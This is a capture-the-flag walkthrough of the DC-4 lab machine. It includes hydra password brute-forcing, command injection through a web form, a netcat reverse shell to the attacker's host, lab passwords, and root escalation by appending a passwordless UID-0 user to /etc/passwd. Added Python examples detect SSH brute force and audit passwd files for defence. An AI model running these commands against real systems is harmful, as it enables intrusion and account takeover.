Description:
There is only one flag, but technically there are multiple entry points, and, just like last time, there are no clues.
192.168.37.133
Simply submitting the form logs you in.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f
?radio=ls+-l&submit=Run
?radio=du+-h&submit=Run
nc 192.168.37.128 6666 -e /bin/bash
python -c "import pty; pty.spawn('/bin/bash')"
Three users with login shells?
So far brute force seems to be the only option, but two sensitive directories are found under the filesystem root:
root
home
However, we do not have permission to access the root directory, while the home directory can be entered, and inside it we find the three:
#!/bin/bash
for i in {1..5}
do
    sleep 1
    echo "Learn bash they said."
    sleep 1
    echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
hydra -l jim -P DC-4_passwd.txt 192.168.37.133 ssh
[22][ssh] host: 192.168.37.133   login: jim   password: jibril04
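From the defender's side, the SSH password-guessing step above leaves a very recognisable trace in sshd's log: many "Failed password" lines for one user from one source within seconds, often followed by an "Accepted password" from the same source. The following is an added example (mine, not from the original writeup) that runs a sliding-window detector over constructed sample auth.log lines; the log lines, the source address, the year, the threshold and the window length are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd log lines in syslog format (not from the DC-4 host):
# a burst of failed logins for one user from one source, then a success.
SAMPLE_AUTH_LOG = """\
Apr  7 02:20:01 dc-4 sshd[1201]: Failed password for jim from 192.168.37.128 port 40210 ssh2
Apr  7 02:20:01 dc-4 sshd[1202]: Failed password for jim from 192.168.37.128 port 40212 ssh2
Apr  7 02:20:02 dc-4 sshd[1203]: Failed password for jim from 192.168.37.128 port 40214 ssh2
Apr  7 02:20:02 dc-4 sshd[1204]: Failed password for jim from 192.168.37.128 port 40216 ssh2
Apr  7 02:20:03 dc-4 sshd[1205]: Failed password for jim from 192.168.37.128 port 40218 ssh2
Apr  7 02:20:03 dc-4 sshd[1206]: Failed password for invalid user admin from 192.168.37.128 port 40220 ssh2
Apr  7 02:20:04 dc-4 sshd[1207]: Failed password for jim from 192.168.37.128 port 40224 ssh2
Apr  7 02:20:05 dc-4 sshd[1208]: Accepted password for jim from 192.168.37.128 port 40226 ssh2
Apr  7 02:23:55 dc-4 sshd[1300]: Accepted password for jim from 192.168.0.100 port 51000 ssh2
"""

# Matches both "Failed password for jim ..." and "Failed password for invalid user X ...".
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_syslog_ts(ts, year=2019):
    """Syslog timestamps carry no year; the caller supplies one (2019 is assumed here)."""
    return datetime.strptime(f"{year} " + " ".join(ts.split()), "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return one alert per (source, user) pair that reaches `threshold` failed
    logins inside a sliding window of `window_s` seconds. The alert records the
    total failures seen and whether a successful login from that source followed,
    which is the signal that the guessing worked."""
    recent = defaultdict(list)   # key -> failure timestamps still inside the window
    totals = defaultdict(int)    # key -> all failures seen for the key
    alerts = {}                  # key -> alert dict
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = parse_syslog_ts(m.group("ts"))
        key = (m.group("src"), m.group("user"))
        if m.group("result") == "Failed":
            totals[key] += 1
            recent[key] = [t for t in recent[key] if (ts - t).total_seconds() <= window_s]
            recent[key].append(ts)
            if len(recent[key]) >= threshold:
                alert = alerts.setdefault(key, {
                    "src": key[0], "user": key[1],
                    "first_seen": recent[key][0],
                    "failures": 0, "succeeded": False,
                })
                alert["failures"] = totals[key]
        elif key in alerts:
            # A success from a source that was already guessing: treat as compromise.
            alerts[key]["succeeded"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        status = "SUCCEEDED" if a["succeeded"] else "ongoing"
        print(f"{a['src']} -> {a['user']}: {a['failures']} failures since "
              f"{a['first_seen']:%b %d %H:%M:%S} ({status})")
```

On a Debian host like the one in this writeup the input would be /var/log/auth.log. The same pattern is what fail2ban keys on; the alert with `succeeded` set is the one to act on first, since it means the account's password has been found and the session that followed needs to be reviewed.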
ssh jim@192.168.37.133
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
After logging in, the banner shows that this is a Linux system and that there is mail waiting.
cat mbox
This is the content of the mail:
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
Since on a Linux system every received mail is saved in the file "/var/spool/mail/[linux username]" (see: linux用户的邮件存在哪里,在Linux系统中收发及查看邮件_ssslience的博客-CSDN博客), we look there.
cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya, Charles
From the mail we learn that Charles left his password for jim, and Charles is also one of the three users we found earlier.
su charles
We can see that the first option is -a, which appends to the specified file without overwriting its existing contents.
The third field is root's gid.
Leave the second (password) field empty, use root's uid and gid for the third (uid) and fourth (gid) fields, and a new administrator is added directly to the Linux user table:
echo "Sherlock::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
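The entry written above is exactly the kind of line a defender should be checking /etc/passwd for: a second UID-0 account, an empty password field, and an interactive shell with no home directory. The following added example (mine, not from the original writeup) audits a passwd file for these conditions; the sample file contents, including the appended account, are constructed and not taken from the DC-4 machine.

```python
from collections import namedtuple

# Constructed sample /etc/passwd (not from the DC-4 host). The last line mirrors
# the entry the append step above creates: uid/gid 0, empty password, no home.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Sherlock::0:0:::/bin/bash
"""

Finding = namedtuple("Finding", "lineno user reason")

# Password-field values that mean "hash lives in /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", ""}


def audit_passwd(text):
    """Return a list of Finding objects for suspicious /etc/passwd entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append(Finding(lineno, raw, "malformed entry: expected 7 colon-separated fields"))
            continue
        user, pw, uid, gid, _gecos, home, shell = fields
        if not uid.isdigit() or not gid.isdigit():
            findings.append(Finding(lineno, user, "non-numeric uid/gid"))
            continue
        # An empty password field means the account can be used with no password.
        if pw == "":
            findings.append(Finding(lineno, user, "empty password field (passwordless login)"))
        # A hash placed directly in world-readable /etc/passwd bypasses /etc/shadow.
        elif pw not in SHADOWED_OR_LOCKED and not pw.startswith("!"):
            findings.append(Finding(lineno, user, "password hash stored in /etc/passwd instead of /etc/shadow"))
        # Any uid-0 account that is not root is a second superuser.
        if uid == "0" and user != "root":
            findings.append(Finding(lineno, user, "uid 0 but username is not root (extra superuser)"))
        # An interactive shell with no home directory is typical of a hand-appended line.
        if home == "" and shell not in NON_LOGIN_SHELLS:
            findings.append(Finding(lineno, user, "interactive shell but no home directory"))
    return findings


def uid0_accounts(text):
    """Sorted names of all accounts with uid 0; anything beyond ['root'] needs explaining."""
    names = []
    for raw in text.splitlines():
        fields = raw.split(":")
        if len(fields) == 7 and fields[2] == "0":
            names.append(fields[0])
    return sorted(names)


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.lineno}: {f.user}: {f.reason}")
    print("uid 0 accounts:", uid0_accounts(SAMPLE_PASSWD))
```

On a live host the same check is `audit_passwd(open("/etc/passwd").read())`, or the one-liner `awk -F: '$3==0' /etc/passwd` for the uid-0 case alone. The finding that matters for prevention is the one this writeup exploits: a sudo rule that lets an unprivileged user run a program that writes to arbitrary files (here a copy of tee) is equivalent to giving that user root, so sudoers entries should be reviewed for any command that can append to or overwrite files.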